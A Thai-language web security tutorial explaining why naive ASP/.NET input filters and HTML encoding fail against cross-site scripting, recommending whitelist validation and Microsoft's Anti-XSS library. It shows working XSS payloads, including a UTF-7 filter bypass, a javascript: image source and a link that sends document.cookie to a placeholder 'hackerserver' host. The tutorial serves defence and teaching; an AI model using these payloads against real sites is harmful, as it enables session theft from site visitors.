ไม่ว่าข้อมูลใดๆก็ตามที่ได้รับจาก User ถือว่ามีความเสี่ยงในด้านของปลอดภัยทั้งนั้น เพราะเราไม่สามารถรู้วัตถประสงค์ที่แท้จริงของผู้ใช้งานระบบของเราว่าเค้าจะใส่ข้อมูลที่เราต้องการหรืออาจจะเป็นข้อมูลที่เราไม่พึ่งประสงค์เข้ามาในระบบ หนทางที่ดีที่สุดคือการใส่ระบบป้องกันให้ระบบของเรา หรือ การเขียน program ให้ปลอดภัยนั้นเอง
การโจมตีสามารถทำได้โดย การเขียน script ฝั่งลงไปกับข้อมูล (Cross site scripting attacks) หรือการหาช่ิองทางของคำสั่ง query ในฐานข้อมูลเพื่อดึงข้อมูลที่ต้องการออกมา (SQL injection attacks) สามารถทำได้หลากหลายรูปแบบ และเป็นสิ่งที่เราน่าจะเรียนรู้เพื่อนำไปสู่วิธี่การป้องกันที่ดี ลองคิดดูว่าการเขียนโปรแกรมของเรามีการจัดการเรื่องพวกนี้ได้ดีแค่ไหน หรือ ดีพอหรือยัง มาดูตัวอย่างการป้องกันที่เราคิดว่าน่าจะเพียงพอ
ถ้าข้อมูลที่เราได้รับเป็นแบบนี้
somepage.aspx?foo=<script>alert('vulnerable XSS code')</script>
ฝั่ง Server เราก็เขียนก็แค่เขียน filter เพื่อป้องกันไม่ให้ script นี้สามารถ รันได้
1 <% 2 fooString= Request.querystring("foo") 3 fooString = Replace(fooString, "<", " ") 4 fooString = Replace(fooString, ">", " ") 5 fooString = Replace(fooString, "%", " ") 6 fooString = Replace(fooString, ",", " ") 7 Response.Write fooString 8 %>
จะเห็นได้ว่าแค่นี้ก็น่าจะเพียงพอแล้วที่เราจะป้องกันจากวิธีการโจมตีด้วยวิธีนี้ ถ้าอย่างนั้น หากผู้โจมตีเปลี่ยนรูปแบบข้อมูลเป็น
somepage.aspx?foo=%2bADw-script%2bAD4-alert('vulnerable XSS code')%2bADw-/script%2bAD4-
การป้องการด้านบนก็ไม่สามารถป้องกันได้
ถ้าเราเปลี่ยนมาใช้การเข้ารหัสข้อมูลที่เป็น HTML ก่อนนำไปใช้งานโดย Server.HTMLEncode()
1 Server.HTMLEncode(<%= (Request.Params["Search"])%>);
แต่ถ้าข้อมูลที่ได้รับเป็นแบบนี้
1 <a id=evilLink href="http://victimsite.com 2 /sample.aspx?Search='search+string'%3Bw%3Dwindow.open('http%3A%2F 3 %2Fhackerserver%2Fhackersite 4 %2F%3F'%2Bdocument.cookie%2C'wname'%2C'width%3D10%2Cheight%3D10') 5 %3BsetTimeout('w.close()'%2C1000)%3Balert('Please+try+again')" mce_href="http://victimsite.com 6 /sample.aspx?Search='search+string'%3Bw%3Dwindow.open('http%3A%2F 7 %2Fhackerserver%2Fhackersite 8 %2F%3F'%2Bdocument.cookie%2C'wname'%2C'width%3D10%2Cheight% 9 3D10')%3BsetTimeout('w.close()'%2C1000)%3Balert('Please+try+again')"> 10 http://victimsite.com/default.aspx</a>
อีกตัวอย่างหนึ่งถ้าเราใช้ Server.HTMLEncode()
<IMG src='<%=Server.HtmlEncode(request("im"))%>'>
ถ้าข้อมูลมี่ได้รับเป็นแบบนี้
<IMG src="javascript:alert('XSS');">
สังเกตได้ว่าจะไม่มี tag "<" หรือ ">" ให้เห็นเลย การเข้ารหัส HTML จึงไม่เกิดขึ้น
การตรวจข้อมูลที่นำเข้า (Input Validation)
ดังนั้นก็ป้องกันที่ดีนั้นควรกำหนรูปแบบข้อมูลที่เราต้องการขึ้นมาก่อนหรือที่เรียกว่า White list แล้วทำการตรวจสอบ (Validation)เอาเฉพาะข้อมูลที่ต้องการเท่านั้น นอกเหนือจากนั้นถือว่าเป็น ข้อมูลที่ไม่พึ่งประสงค์ การตรวจสอบอาจจะใช้ Regular expression เช่น
string pattern = @"^[A-Za-z]+$"; //รับข้อมูลที่เป็นตัวอักษร a-z เท่านั้น
การเข้ารหัสข้อมูลที่เราดึงมาใช้งาน (Output Encoding)
ใน .net สามารถนำ library Anti-Cross Site Scripting ของ Microsoft มาใช้ได้เลย
http://msdn.microsoft.com/en-us/security/aa973814.aspx
หรือใช้ XSSDetect ซึ่งเป็น pluginใน Visual Studio มาใช้ในการตรวจสอบ code
